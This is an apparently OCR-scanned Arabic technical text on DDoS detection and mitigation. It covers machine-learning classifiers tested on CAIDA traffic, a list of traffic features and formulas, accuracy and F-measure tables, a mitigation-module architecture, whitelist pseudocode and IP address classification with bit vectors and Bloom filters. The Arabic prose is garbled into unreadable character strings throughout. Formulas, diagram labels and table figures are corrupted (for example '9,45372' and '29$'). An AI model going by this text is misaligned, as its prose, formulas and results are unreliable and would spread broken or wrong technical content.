4^^)^. ^■ft.t.tiJ ^_5^1j aL^Q ^>!ai3l (TCP/IP) J J^J^ J ci Jud ^ Ju ^J l)> 4-^^ 

p >JI o* uj^ J . Jliall t ^ "traffic-flows" ciiisjll a£ jla ^UJI lj* ."traffic-flows" ^Ua^l 

^jt jjc (IP) (J J^J^>^^ dilaa ^^>^- (ja> ^ '^^-^^ 6 ^A .TCP jfi*** Jc 4_Lil^ JU^jI ^ ■ ala ^jJaJ 

CjUjaj ^a-> J I ^dlia .CjUI > >ijq^l CjU^A Jl£juj) c qVi^ ^ ^jc. c Lia£H CjljVqM L5 -^-La ^a^i .(JJJ^I J Jj^ ^ '2006 J 

."activity profiling" ^Ailt LiaHI I 
."Sequential change-point detection" mIuAujI ^ I jjiU) ^Lij t_Li£ - 
."wavelet-based signal analysis" cjUjj^I - 

(JjlaJ ^ ^>fi*j CjU»UuaV1 l^^c jjjj l^ili ttilli m Cj& jll tilli a -\V\ A\ cAjl&£1 <aiaLa Sjaj ^ jjuj J!L<»j V (JjtiLalt 

<Jjou31j o^jlill ^j^^xi ^JJjlLo ^ l^ilj IjAiLujI ^ulUll ^Ja» a q\ 4^A^)Jaj 6(JjjLujV1 J .(J 7- all I^A J ^^^-^^ lS-**^ 

<C5 lliaJI ^llxJl J Cjl^jJall ClAiiJ J ^ ^cjtnl) jV ^JjVI Cjl£jJa3l ^l^xJ 

"Detection Performance" f >At 0^ ^£11 
.Kline et al h-? ^ ^ tJUJI .<JL^11 !1a J j JaLuij c!3Ua jl£ ^Car/ ^ a/ ^aI j^' 

~ <jc c fljua^lj J-^c (J^ Jjijj J AjjaLijjll lIjU^jII ^ 1^.1 j ^jl j Ia j£i ^akj ^I^VI Jc jj^jlill 

ta 6^1 jA ^Ij j i^j^l* l^^a ^a djlcjjuJ! 6^a "wire speed" ^-c-j^ cr^^ ^ ajjoLoiVI JLujjVI JojI jj ^ 
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<c jjoij (JaxJI ^^ic Ull^. 6j^lS jj£j jl ( ; ^ j l ftju^ll daULao <jaia\_L<JI ^Ic. Sj^lS jj£j ^^Ij j?* jl j^ill ^ lIjIIluo^jII JjS j>* 

jJjLj CAllJj jj jjUx^ll Sj^-aJ '^jl J-^l 4_^Jlx-<Jlj <^-*-H pbVI I^A Jg-Ia Ja^Jl jj^aJ -^5^' UJ-^ U' cJ 1 '(J^VI ^^ic GbpSlO 

j* l_jjj£j <c jjoij L^-La ujj dab ^LoJIj a j^_^VI a^A (JIa < a *XU S jj !-n a CIA-Aac. ^jq'n j aj a - ^ 4 ^ a i— iIxj^ 4 ?n n^cJI dLis^^Jl 

'AMCC np7510 'Intel IXP2400 Jk) J^ ( ^ 1>^j>^ ^ jj^J j SJ^Vl c> ^jM^ ^ 

^jljSll <cil3i AiUbVU .(Routing Switch Processor j Agere Fast Pattern Processor j EZchip NP-1 

.lJ^JI JjLli] field-programmable gate arrays (FPGAs) *bVl 

e-hVI aJ^c cjLaJlxx dUjl£^j Liiixlajl ^jII j .Shanbhag and Wolf j^ j ^ j-^ll 4-^jjl j=* ^ahvimV Jjaj tilUA 

lgjL.La.aJ ^aJ j* j ^flaJ jA 4_Lajjl jk <j£ j* £^-ill (jli t^Uaill liA (JJa , jl jla cJ^-^ ^ j^juJI jC- L_Lu£3l diU^jjl jk j* AjAxJI (Jjt-JuI 

<J^j j-a e-taVI j-a j^S ^ > sib] (jj^aJ ^cLaii ^^jII j jjj-all ^j^> ^ 3L3> ^ Wq^l ditaLjll <JiLa i-ijmj jjjULg jl£ j^ ^ 

fC jiaJJ ^^Ij CjULjajill Cl >1 ^a^-j JbJl <JAsla3I jc t flJu£l] c£ J^^l L_u3LaiVI (J^asu tilU^a ;L_bujl_L<Jl CjS jll t *q.*<U L_fl^J! ^jjj^J 

liA ^ jjjall ^> u^j^ tl^j^la ^> ^ jll ^ jaJl (payload) l^j^j header il t> lA^^ J^- 

header l£ lSJ^ ^c^lli ^ ^Ujj .^jI^JIj c^jll ^ 4iK* ^ ^>JI CjUjI^j "packet header" ^>J> l>-jjj 

.CjUL gajaS) f J?^ <J^^ JAslaII J^lk JJoflll A-Ani <Jaij jj^alll 4JlaJl tdilaUlkl Luijj jl C5 lc ftj^SlI I^jJ ^ J£ ^5 jSa o j 

ttilli AiLjaVU ,<-ftjaJ! ^ jjj jll IP <jjjU^ j j.i^a.* <LLouj U^jjIj ^-jj^j header ^ Jj^" ^^Vu ^UuaVI ^ 
header TCP ^^jt> jSa^ll ^ ^ jku "low-level packet analysis' u *^ v ^ ^ ^^^^ 

cjUJI^ j ((FPGA) ^ H ^I^Vl ^ Sj^Vl jj^ jk Ai ^L, ."transport layer' 

.^j^ Jil "application-lever £ A1aAsZ1 \ ^JL** J^kj ^^Ic S j^£3! tilli ^ Loj t^j^Jl ^Jn&i ^1 j^V jVI 

^ jljSl! j!^Ulaj| s j^ll Liajl jVl ^3Ua .application-aware firewalls ^ ^ *^ 6 ^ ^ J^ 3 jW^^ l$J±^\ 
JU^jI jUj l) ju ^ ju ^ cJjkj (j-<»j ^j^js (JL^aul Cjlia^j ^^>^- CP- CjI^JUlx Jj^llxJI 

jj jjj^ll jl <J^^)i3l a£jjoJ1 J j S^C-Lolaj iAaJ q\ (j^-dJ ^ j^^ll iaLudil ^^-^^ ^AaJlll 6L_fl J^lall (J^ 3 *^ ^ <il ^jJal jll j-<i 

djlc ja*\ a\ (J jVI ^alL<Jl ^Luaill A^VI ^Ij^l ^ iillil J .^J^ C5^^ ^J^l JJ^ -^L^ AilxIxJl diUi jIscaII JjUjI 

dIa JiLd jjou J-dlc jA j ttLLuj jA La£ cojjikl <Jaij /o^li^j l^j^jii jl egressj ingress ^ j^ *^j^ ^f^JI 

6^^.VI jfll jj jaJl j e-bV! (^^Jc ULoj jijJ uiij) ji^ill jl j-d li j^. til^LojVI <c jjaij ^^.t.tij Uua <J>ulI! ^jj^S jj^UII 

ui^l d^A j^ c Liaall ^ ^LilA 6 jixk ^ <C jjoJI Aj jl jIaII <^JU-a3I 

"Decision-Making and Mitigation" UjlST <> c SjiAM tj jljill j-l^a 

kb aS ^jI jSII .^b jjoJI <xjU1I/" binary whitelist" *\ > ^jjti ^Ull (jJ-J ^j^il JaU^II jt J jjSII jlja iUJl j£dj 
real-time black-hole lists ^source or destination-based access control lists 'J^l <Jl^VI j^ A^jlLi a^^a^ 

Jjajuj t^U^jUJI cil jSaVI j* (<j (jj5 j^l) ^jI jilt i>i& j^ CjU jIslJI (j^LkU j£<»j ttilli ^1 AiLjaVljj .DNS black lists j 
jjj .k>j3t 11a .CBL ( http://cbl.abuseat.org ) j Spamhaus XBL ( http ://www.spamhaus.org/xbl ) « Jl^ll 

, jljill 4_iLaC j-d W lA jUjcU 4 J*^J ^-^jVI j^i^llj ^ajl j^ll &.AA ^I^JjujIj ^Ludjj ^IjJ A Lal£]| ^aaAlLJl 

^aJj ja^A I^J ^j^aj 4jjlla-<Jl c qjq^Ml 4 j^jll jloal Aiili j ^ > ^il jVI dj|^)±aJl j jl^VI j-« <C ja-\ a dij^Ja ^IjVI <J ^li. 

A^Lai jxi AaJl jA c Liaal) ^Li^jjIjIojI Jj^-« jl t^jljld j^J ^^ic Sjjiala Cllaaj^a) 6^A Ajcli^ll diUlVI Whilst c Aju^JI 

Ldl jj^J ^ ja» CjIjUj jl 4_pji3l IP ^a ja. ( ■ lUaJJ HAj tDjjjjJalb . j^A^ CllSj ^JjujI ^ l^JS ^aJllI j^J CjUjIoia ^1 JjJ^H ^ja» 
^aJJ ^a jaJl ^1 jljill ilaJl jxi ^aja^U CllS jll ^ (djIjLiillj) ^a jaJt <^JIxa ^ ^A <lal^ll <Jj»j^a3l .lA ja.lj jl I^JaL^J ^aJJ jl 

. jljill I^A iLaJl ^aJJ jjlj tAilcl jj^ JAJ ^^jll jaJl L$\j 'l^J ^IajoJI ^aJJ ^ jaJl ig\ 
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random early detection ^->W* jj j^j^ ^ ' cft^M <-W^ ^ .aS^i ^U^ jl s jbV g-I^l cjSjII jSuJI J**]! j 
jl** cUj TCP ? > ^ ^UL-^VI jjii ^1 j (FRED) fair random early detection j (RED) 



a^^1\ cjUaA ^ uLi£U Machine-Learning Algorithms ^L** jJ 

^xujjj cjUjii j djUxijjl ja. jjjJajj ^Loj^aij ^ Ukj^a Vl *l£ilt ^ jjs (machine learning) ^Vl ^Ixiill 

cilUA r lc ."^1" cil^U 

.Ajjiulj ^jjUjkJIj ^L^VIj (data mining) 

^j^j] <!Ui ^iLftj l^l^klujl ^jSaj ^1 j Ajalill j <aJU^a3l "Subset of features" ^j^t (.> ^ ^ j^^^ -1 

.c-L ui Sll ^uLc; ^ du^kloal ^1 j "Machine-Learning" ^Vl ^aLu djluii c alik^ AJUi ^j^jj -2 
"attributes" ^jI^JI ^Ij^I ^ c5j^ c^^j "process of feature reduction" ^ ^ J£U^ ^JixJ <j^3b 

<JVl ^jIxj djli&i Jl*) "modelling technique" cjli&i (j^Saj Jja <L^a3l djlij k±*&\ J£)I\ "feature" ^ 

L^jiill c_jjlk<JI Cjajll ("statistical techniques" ajjU^VI ^jJUVi ^jU^j "Machine-Learning" 

^^klauJI ^ ftj^ll dAi5L&.VI o& a^JcA\ a£j^> CsP^ cJ^ikVI sai^ £±*J£\ ^ "node" 

tilliA ^jl t(_^^>a.! 4_S£juL<i A^Jjuj (^^-Sc «4_ix_nJa» A^^)^ cJ^julj Lq L-Jxj ^11 (J- (JS ^jj^ 

jjja ^^IslSI <i! jLaJI ^jc ^ j^^ll t il j£ jLoj clA^ ; ** 1 J^ J a£jjoJI CjU£ jLoj A-aA^j A-iA^VI j-<il a£jjoJI A^^aJ aL^II dili j 
(j-a A-Ujaij 4_ijLdj jUlklj I "^lm ^ al" ujj^-^ J 'cJ^^^ cJ^f^ . t — J ^ *\\ Jjs ^ aJ£jouJ1 AjojIj^ duj j 

^jc L_fljai£3l (jjaaJii AJlxill A^jjaJI ^ajL^a. ij laiL I jA£ "Zargar et al" uj^)^j j^j j .a£jjoJI (3^^ AJSim* uj^ L - J ^ 
. JlaVl Sj^ll A^^^ ^j^i3 (PCA) "Principal Component Analysis" gr^J^ uj^^ cJJ^ ^l^ki^U cillij ^ja^JI 
(jc t smi^H ^jjIjjII j-<^ ^ j^l j (Jjjj^ CjI its c &jujSJ ^AxlxJI ialiijVl cJJ^i c5jj^ Aju^IIaj I jA£ "Jin et al" ujj^ j u^- 

^•LaJ I jiiil .(jjliill (JjlaJ j-aj U£ TCP u^U ls* flag-bit lS^ I jIaxIujI .cjULjajjill ci iLa^a 

^1 ^a.jj V Ail j& j Uu^j Iajs a] l_j jLojVI (jli ttilli ^ j .SYN flooding ^ c Lj^ll A^jiiLJI <Ljia3l ^l^klojl 

_<aja£L<i Ai^ £A (J^J^ ^ cJ^^ 1 ^ c ftju^ Ajfll^ jl AaJU^ djl jjLd flag AjjoJI ^jL ^jUuia 

Aa. L^tijj duj i (machine learning) c^^^ ^ 6 u j>^^ ^ 'u^ j .l^j^ f ^ 

tUlla. t^lxjll ^ ALjia ^Ulbj ALjia SjJfl ( . lllaJJ tCjUjfljll oi^ ^jSl j .DDoS i— (jc c Ljo^ll ^ A^^ll ^ A^^ 

us 

Paruchuri et " uj^)^^ J l^jj^j^ .lh c &ju^ ^ j^^l Ailj£ ^l.^luiV a^j^a. ajjILj Uiajl I ja-jlial j ,cijL<i jl*-<J! c Luj£ 4jljuj 
A^ja. J£ diia. ^TTL-based PPM scheme ^U^j Probabilistic Packet Marking (PPM) ^j^^ "al 

(jj^kl j ^jjjaJ m ^ jy&W jA*s*a ^nVil A-iauJal! j^u^d Ai^x-d ^jjj Uui tA^^aJl Aiajoal Cj ^^jll AiLauJl £a LluAc L-Lail nj <jLuaJ 

.K-NN Classifier aIjj^ ^l^ki^lj ^ j& < LSSM cillij cjU^a AailU I jlLJ jjj^l ^IS "Nguyen et al." 
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j .u^j^ f lWj-* cJ^ ^ a£jJo3I <!L^. c Lii^ajl k-nearest neighbour ^^A 3 1 j^^^l ^-j) 

g\ j^IojV ^ j^i djlLfki ^ JUJl jA U£ (Jjjj^ *n ^ 4 ^ uiK I I ^ "computational intensity" 4jA**aJI <K jli ^LLLuj 

.SjjU^l! CjULJl ^cl j3 (Jjl^J ^aJJ Cilia CjUUJI 

^ 14 ^Ic- c5 ^-c- ^ <^a j .KDD dataset u^j^ ^ q>*^1 cjLuSj ^bl ^jj^jI 'La^vim^l aj-ulujII ^jjILJI .1^.1 

.Smart and Secure Environment (SSE) ^ public-domain CAIDA dataset 

B cjLa^J! d^a cJ^U. l^-^-c- j^c. cJ^joij jjj - *^ ^^>^ cjUAlaIIj V DDoS C-^U^a ^ ^ alia a ^! jj! <LujIjj c_ lqj 

djl ^^c> (j£-<»j ^^jII j chi-square > ^-s^*-^^ cJ^-^- el) -0 ^ L - J ^ 6 ^ ■ L - J ^ 23 ^ 

'Naive Bayesian 'K-NN 'SVM <W! CjI^ jji ^I^L.U "classifier" * Vn^i^ t *ti>j ^ 

t> SjIilJI a^j^JI pbV Uiiij j^I ^> 6 1a .Fuzzy c-means clusteringj K-means 'Decision Tree 

Receiver Operating Characteristic (ROC) yr* jj'j^j .DDoS ^ < ^ ^IxjII 3JI CjU^ Jjlja. 

^Ljajj ^ Fuzzy c-means clustering ^ ^" . n^ l c-jJLojVI < atLk^ ^ ^aj Ja»JI 11a ^> .F-measurej 

"Feature Selection and Evaluation" f^^Jtj SjULLaJI cjIjj^JI 

1. One-Way Connection Density (OWCD) 

2. Average length of IP flow 

3. The ratio between incoming and outgoing packets 

4. Entropy of IP flow length 

5. Entropy of the packet ratios of the three protocols TCP, UDP and ICMP 

6. Ratio of TCP protocol 

7. Ratio of UDP protocol 

8. Ratio of ICMP protocol 

9. Number of data bytes from source to destination 

10. Number of data bytes from destination to source 

11. Number of packets in which destination port is mapped to a particular service 

12. Type of the protocol, e.g. TCP, UDP, ICMP 

13. The number of packets having the same source IP address and destination IP address 

14. Number of wrong fragments 

15. Number of connections that have SYN errors 

16. Number of connections to the same source IP 

17. Number of connections having the same destination host 

18. Number of packets where URG flag is set 

19. Number of packets where SYN flag is set 

20. Number of packets where FIN flag is set 

21. Number of packets where ACK flag is set 

22. Number of packets where PSH flag is set 

23. Number of packets where RST flag is set 

4-uIa ^jSli^ 
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jL^ikl chi-square M^-^jj "gain information" <_D^. i> cjI J^ll mjjj 2 f ^ U3a L£j 

(a) One-Way Connection Density (OWCD): 

V; OWC Packets 

OWCD - E / fftcte , xl0 ° (51) 

(b) Average Length of IP Flow (Lave flow): 

^^iii ^pJI c ^ixj Length of IP flow ^ .{^^J^jj^h ^ IP u^j^ < j^^Jl ^ < jAj^iJI ip Cj\j^) 

IP flow c^! 

J2 IP Packets 
IP Flows 

(c) Incoming and Outgoing Ratio of IP packets (Rio): 

incoming IP Pacfcefs 

R. a = -±=^ - (53) 

outgoing IP Packets 



(d) Ratio of TCP Protocol (Rt ): 

y //* Packets 



J2 TCP Packets _ 



(e) Ratio of UDP Protocol (Ru): 



E UDP Packets 
Rt = ]T IP Packets (5 ' 5) 

(f) Ratio of ICMP Protocol (Ri ): 

J2 1 CMP Packets 

ft/ = — — ^ (~>.o) 

YL IP Packets 

(g) Land: The number of packets having the same source IP address and destination IP address. 

(h) Protocol-type: Type of the Protocol, e.g. TCP, UDP, ICMP, etc. 

x — JC 

z = 



cjUUJI ia^ji^ i (value of each feature) Sja* y^J^ yr^' c^- ^ oj 'x <x cjUIx^I 

"(standard deviation) l$Ji*^\ lJIj^jVIj (mean of the sample dataset) 
tji* J£ ajjj ^Ual information gainj chi-square A^L^j (j^ki ^ t^lli ^iL^yu 
tc_jjUall ^ j^JI ^U?J ^W^^ -^^^ c> ^W^l ^ c> oiA j-l j^IujI ^ j^l S jJaaJI 

^ machine-learning s^j^ yr* SjkaJI .sampling frequency of 1 s ^ 
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.machine-learning classifiers CjUi^ JjS ^1 ^> ajJ&Vi o>LJ ^ A^nL 

<lj ^IjS j^^aV^ KNIME cs^^ jjLd obi J ikUj aj^IxJ! ^j^-j ^ jrs^ t 'j' 1 ^" ^ .4^-*^ jjj*^' 

cs^' 4_pUll CAIDA J^^i J^ll J u^jj . https ://www.knime.or g -W jll i> 

.SSE ^ 



Samples collected 



Network Data 


Data type 


Total number 
of packets 


Trained 


Attack (CAIDA) 


9,45372 




Normal 


1J 0,535 


Unseen test data 


Attack (CAIDA) 


3,24,098 




Normal 


36,485 



Classification 



Method used 


classification % 


Fuzzy e- means 


VS. 7 


Naive B a ye si an 


97.2 




96.4 






Decision tree 


95 .6 


PC- means 


96,7 



.f-measure J^>^ Jj^' 



F- Measure details 

■s 



Method 


TP 


FP 


TN 


FN 


F- measure 


Fuzzy c -means 


29$ 


2 


270 


3 


0.987 


Naive B aye si an 


290 


] 0 


256 


17 


0.972 


KNN 


2 SO 


20 


243 


30 


0.969 


SVM 


282 


] S 


253 


20 


0.964 


K- means 


285 


] 5 


273 


0 


0.9669 


Decision tree 


278 


22 


218 


55 


0.956 



(jli 4l_jjL^j3I d^a ^jUj ^^ic .d^^xJI niachine-learning cjl_u£i3 ROC Lq ^l^kiujlj ^jUj j&^j cs-^-^ J^-^ 

.DDoS l-d^A L-flju^ll ^ ^jIjjJ! JjJaSl ^gjaau FCM (J^l 1 




Fa i s.<ej Positive F=: ate 
Naive Bayesian 



https://www.facebook.com/tibea2004 
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Dos Detection Using Change Point Analysis (CPA) Of Not Seen Previously (NSP) IP Addresses 



I jk>j . Jj^I CjUI£3 ^jja ^j^j] CjU jlx^l j* TCP/IP jjc CjVL^jVI j* V ^ IP j^jUc 

4^jlauJI (j^ajL^iJ! ~ i J jjj ^^jII a£jjoJI ^^p* j^ jjj^l a ^ *j .DDoS 1 CjIa^aj (DoS) 4-^-^JI j-a j^^p^l 

."flash event" j ^2JI jjj* 

jj^J* -iaJ^)J IP J fQ ^ > *aJ ^aJ ^ j .TCP/IP L>^ 4^^l <flf2all ^ J j^Jl j dl3jl3Vl 4£jjui <J>ulI j£^<Jl ^)flsu IP <J 

s jj 3* o*^ u^-W^ ^ j .IP header fields o*\ j Jj^- ^i-<^JI/ ( ja^j3l j* ^1 jj^ cjI^jJ^I Jl 

IP jWM ^ ?&j*> i> pg'^^ j '("source address spoofing" ja^JI jljj& Ji«) IP header 

4il (jialjjal diL^gJl cJfLd jc c Luj£I] CjI^jVI j-a J£^^ ^ ^ 6 C5"^-^J J>(£^ cs-^J^ ^ aJLall l^A jl£ tLikjjtj jj^aLJl 

^xjjoij Uu3 <Jjoj j^JI ^jl j-a j-a Jc Sjr-Hmll Jc jjj^Uj I jj-a^ig-xJl tOjjlkVI A-l jVI J J m f J^^ll jAj> r-i<fl jl jJC L_flJJ jj ^aJJ 

j^ (Jjt^J Uui ^^CJjuJI ^a^JjauJl <il jLal ^JJJ j , jAj^xJI XP j^J^- ^—^j^ Jl ^H^J V £>i& j jJj^)31 ^jWqj 

lAjLudjj ^aJ ^j3I JJ^) - ^^ ^^)^ L^^)^^ ^ ^ o3 a ^-x»Jj g a11 1 <j^aLk]| JJ^)>Ji ^^)^J <£jjuoll JJ^>-<» ^^>^ (j^J jjj sill L_lstj^a3l 



(jc- aju^H AjjojLujI <1loj j£ CjI AilxIxJl- J,^> <~ia\\ JP ^jl jJC ^l^lull ^ CjI^jI 6 Alkali liA ^ .l^iLujj^l 

j& DDoS uL^a IP jl 
d^j^J! IP (JjjUc; J jj^aj Ja*^ ^ s^LaJI ft^bjll s-n^j ^bjj jl j^Ai 11a j .2 32 IP cl^j^ A-jjl , CjUUJI jJJ^J 

4-byte c> ^^^^ « i> uj^ 'MULTIOPS "G// awrf Poletto" j^j^j ^ jSI t^Jaall <^JUJ 

^ 1£ uj a .Peng et al. ci^^A 3 SjSlill ^UiLujI c > >i <Jaij ^_ilasu3 ^j^V c Sj ^ ^ jiiLJI <J^JI ^^ic jj^l .256-ary j 

2 32 ^ j^? * ls* j ^ L IP u^j^ c ' cl>^ "subnet" 4^^)^ ^ j ^ J djUi jlstxJI jj^j ^^la jc. I^JjUj oj^lill 
Jl ^jU^ ^ jjSI S&j m fj*l\ Uim^ ^^Jl ^AxJI j^ Ji£l JLiijI jl TCP J ^LaiK^^t J <£U Jio <^tull j^j^^ c> 
^jujU Luiaj) L_flj^)x-<JI) oj^lill ^UiLujI J^kj ciula JjIaJI .Peng et al. (j^o^ j v IP u^j^ c ' ^j^?*^ ^Luj) Jc a^. 
^JL dii^. 1 (IPv6) IP l>* J^JI J^JI J J^^-^l ^Jajc Jl jj jl j^j j^3 j UjLoj <K jll j (scalability 

.IPv4 jl 5^^Jax jxi jj£l jjjUxJl ^^C 
; L5 A DDoS jc c flJoSl] J ji^Jl J^J^ (JW^ J 4-iuUJ^)3l CAj laall jl dia tlLLoj ^jjja jj La£j 

a j^Jl jjI jxi c Laaall ^jjaJl CJ3 jll J 4jN nnVl J^*^ 

c^ij DMM SjUc cjUSI j^jL I j^li "Ahmed, E., G.Mohay, A. Tickle, and S. Bhatia" uj>ij ^ 



Router, 1 

network firewall 



morxtomng devtctb 1 
r envirarmenl !□ be 




device manAgcmcni 1 
interface 



Co n t rol com ma rtd* | 
L 











JnJr^sron ^»ne^e#-) f/on 
System (tf*S/ 






Network 
Tra,tffcc 



Device m nnngc m ent 
I interface 

t 



Applications 
Server 



Control commands' 



I (DDoS Mir. gallon I 
Modulo) | 



- StJlo iiifor iiulioii 



A. conceptual architecture of a DDoS Mitigation Module fDMIVT) 



https://www.facebook.com/tibea2004 
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"DMM Architecture" DMM 4jjUu> 

£A j DDoS rt^ft ^ <<iJUjLaJl ^ jVl 6 J^aaJl L-IjujI CjS jll ^ j (JjJ j-<Jl ^a J>(S^ (jC L_Lu£3l (jli ttLLuJ JjJjoiI J 

(^Ic .4_pji3l CjU j£-<Jl ^A^- (S^- L>^ lI*^ (j- 0 ^UajJt 4-^-^ 4-lMl 6 jiaaJl ^jli ;^a J^g-!l AjI^J (jC d flju&3l all (jl ^J^-AJ ttilli 

lA jj^ <^5^ a^J^Vl ^a^l (j^J C5^*^ ^Iflajll a^Lk ^^ic (jjjJ J-<^ L_flJjJa-<Jl (J^nlaJ ^jJaJ tJtlxJl J^f^ 

jj^ ta^lc .(IPS) (jlj^VI £-1* ^-laJj "fire Wall" Cjl^Uiajltj AjjUJI (jljAaJl tjtlall cJ^J tJ>»Jjj £>i&j .^a J^g-!l (j-* (J^Uialll 

'"payload" ^ tiat-Lallj ta^jl jll IP (jjjUc (JjjLujI ^^ic j£j Ac I jail (j>» <c a a I lkl> J ; ^3^ (J^nJajll 4^<^ J^-^ 

CLjlinialill Aifla CliLaAk c V^*u>n a1 ja^. q?\ (jc- t a*XU <£jjj| ^3^" L>^ ^-*3^ 13^*^ lS^ 2 ^ (*J^ l£^J IPS .<illi Jl Lgj 

t^UJI UK J . jcIjSII <> qAJ Jaxj (HTTP payload J*) "application-layer services" 

(j^ _ jI^JjujU DjjlstlxJl CjIAjA^jII AliJ 4jL^1ujV1 (j-a &3&-^^ clA^ C5"^ ^Lfc^ C — J ^'^^ <C» jjJa j-all Acl jllI Cjlc a (jli 

,j]ai 1 oij) UJ^ ^ CS"^ 4_i1gVI 63^^^ 6 ^ 'M-*^ Pi ^ t^l^l/t—flJjJaxJl Jc ClAiLulajll 4-^-*^ ^uib.nVI 3^3^ (j^ 

(DIVIIVI) (J^J^ t fljiaJ ^-ujU ^J^*-*^ iAjlftVI ^a^Jjudj Ujli 6^)iaaJI (j* CjU j£-<JI <C j^^ aII ^jU^. <J^j 

.DDoS mitigation module J j^^l ^ j 

j C5 ]c. ^jlill "IPS" (Ji*-^ ^ ^Uaj jl JjnWlH AjIa^ 6^ j lAlA** a *^3^^^ JJO*^ ^J^' JJJ - ^' 

{"J "J a J^J^3^"^ ^^-^^ ^ C5^J^ ^ 'cJ^^^ J^^^ <jJa^x-<Jl 63^-^^^ J ^ajL D]VI]VI C-P 3 ^*^ 

^aJ (j-d j j/nti DIVIIVI ^cIjoiJ 6J^I .CjUiaA ^jC (jj^J (jl cJ^^Jj l!^^^ lS-<^^ *^3^ 'V ^f*^l (jl (j^- ^ 4-C- jJjouJI 

(JlxJI JaslaII ^yL^aia ^^aj Detection Approach ^jaill l_a jjojj .aaa^ ^ ^f^JI ^1 j^/^-iidVI &3^^ J^^^ c^-^- 

"Detection Approach" <-LiSl) 

; jnqjh j (j^ ^DMM ci^l«^ J-<^j ^^£3 A^jjLJI c aJ&II A^3j^ ^3Uj 

."classifying IP addresses" IP ojj^ < ipac - 

ddos 

.((NSP) ^) IP j j ^-*3^ IP ^lj^*^^ ^ ipac j 

V) NA !U^^ ddOS ^%^J ^ laJLujJ m ^ (jia^x-d ^Uaill ^jl£ lil AjA^j3 ddOS ^%^J Ikiml l <^jU3I 4_ild3^^ J^^-^^ (JjLklj 

.(^j^^ o^j*^) Aj (^j^W lP 3 ^*^ 

A^JjaJl JJ^ ^^>^- ^^-Sc V jl ipaC ^ A-ll^aJ <illa j (JJjWl ^aJJ 6<J^Isl!I JjlXjaLill L_fl JJ^ CllaJ (JasU ^^jll A^JjaJl til jLoJ ^^ic L_fl^Xj3l (J^.1 (j-d 

Jaslxj (JjjLujI ^^icj 6(<La^ 10 1 (j-« dlj^ ^jj^ ddos ^A^j ^^c^jjI ^jj 4L_iij^i3l Asu .ddos ^A^j cJ^*-^ uj^ 

c j _A j NA (jjSJWt (j^ 5_JliljVI <i^.j^JI ^a^j ddos j 'ipac j cJ^ ^j >>1 ^ s^j^JI IP (jjjUc J jj^a j 
.DDoS Detection u^j^ ^ ddos ^ ^^" > »^ l < a^ l a^3jIj^. 

AjA^j] t^JJi Asu a Iklujj g.1 - ^j; a3jj 4J| ddOS ^Af^J 6 ^ L ^ 4il t^c- SjLujj oA^i A c^j NA ^JI^JI (j-« JlaijVI -^>^aj 

W^l^ NA A (>« (JlS^VI J .^U-kaJl 3_Aj\i3l (jxuia (JjSj c _^j3I j IP (jJjUc JJJ-<J -lasa ^-LuJl i j& li^j a Li^jll jlai! 

<jajUjaj lA jUjcU pi > ^ijjll 4-Ajlill ^Ia^jjojI (jc L_fl3 j!i3l (_^l c Liaall 4j^j*iljjjail (j-d c Liaall ^1 I1a (_^^JJ <— JJUJ j 6^a J^^l ^1 JjJjoiJ 

J^Lk Ai^laiJI A£fxi3l Clila^ jl ^1 IP (jjjUc; ^LiaJI ^jlall ^ jl^J jjoj t^UJI iiaHll ^ 4Jl j^ilb jjA^JIj .Sjllall 

;^JU]| j^jll ^^Jc (Jasu ddOS ^f^J .^^^^ 4£jJo3I ia jjJj 

if (in state NA) then 

if NOT (StateChange(NA)) then //no state change 

Update White-list (Add IP address/es to white-list) 
else //state change to A 

state = A 

4-uIa ^jSli^ 
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communicate White-list to the protected security device 
if ((in state A) then 

if (StateChange(A)) then //state change to NA 
state = NA 

communicate to the protected security device to 
stop 

using the white-list 

cilli ^ Uj ip ojjU^ <> ^ j^Vl CjI JjJI ^l^ki^l ."false positives" l^jj J ^ j ^ 

JU IP o^j^ ^! ^Wtfl i> ^ V^-l "IP address distribution" IP ub^ tui 5 

cjUA^ Jl ^^jj 4*1^1 cjjjUxJ! ai* IP II ojjU^ J) ^^jj ^1 j (ICMP echo requests J$*) 

djlj^t ^l^klojU iaia (jjjJ £>i& 3 -> o o^jj jaJI fij^ cjLiaS t^^JI ^Sl jll (j^>su jl '"false negatives" 
'"smaller historical time periods" c> j*^ 3 ' ^l^a^t ^jia L^aJ o^3j tgi^j gr^ IP l^j^ t> lSj^VI 

.tgj JjjJ j>» IP (jjjUc Igil iS^-?. L *"^ AjjJaUJ! <cLuj 24 lT^- dlaa jl ^^jll Jaflfl IP (jjjlic a I l^Loai 4<JH<Jl J-iJjuj ^^ic 



(ipac) "IP Address Classification" IP Cxj^ 
^jjjUc Jax-g ^1 ikiLuji ^Uillj 4 a "data structure" tiA^LuJI ^l^kiujl < . iILjj (ipac) IP t 

^Sj^ ^ S^J^aJl IP (JJjUc ^ Vj laj V 6 liA j clnjudJ ^pajklo o^J^Jl IP (JJjUc J jj^aj JAslxj t4_j^UJl 4£jJa3l 

L-L^aJ IstjJalj .flooding attack lT^- o^^aJl IP (jJjUc J JJ^J (J'^ sl - xi *^J^ j ^ J^-J ■^^■^ ^ ^LuiaII 

I (ipac) IP j^* c j 4iiLk-all l— itaAiLajli ^ (JajSI I^a c . lllajjj if j^JI j Aj^lxJl ^_fl j^lall J^tk aj^j^jII ipac J 
Bit vector 
Bloom filter 

1 5i jij^aJI ^ j^c; J£ j 2 29 J j^ 3 "array" ^ ji^a^ ^j^v bit vector ^b^^>iU 32-bit IPv4 u^j^ ^ ^lL^j 

44_a C5 iti UJ£ ^ipac j .IPv4 u^j^- <c a i}AA& j^ill <^.Laui ^ GB 0.5 ^^^l l^^jj I^a j .cIjjIj 

L-jL ula i ^aJJ 6 J - gaila ^I^C. laOjujl J .0^*^ IP (jl ^ J^-J bit VCCtOr U^*^ ^—^yi ^-^J ^ 

^^jj Uui "interval" s jjs j3Lk ^1 s^iaJI IP il o^j^ 

JjL cjli "array" c_JkL bit vector ^l^i^U 128-bit IPv6 ol?^ ( & 'IPv4 ojj^ lP 3 ^ ^ j 

JA<ul (Jj^^jI! o^Uj £cl3 ciij 128 ^—^ 32 (j-* u^j^*^l ^ ^ ^ o^U^ll .Ai ji^^JI j - <J^3 CijU I --^ a ^ 2^" 2 ^ 

CjULiJI cJ^& ^ IPv6 cl^ L^j^^^ djUlkla L^lauloaV ipac ^juj jiill 3 K ^ .IPv6 u^j^ c ' ^-^^ <c ^ 

.bloom filters 

'bit vector j .^ j^^ j^^i ^ ^ J^Ua ^ Bloom filters 

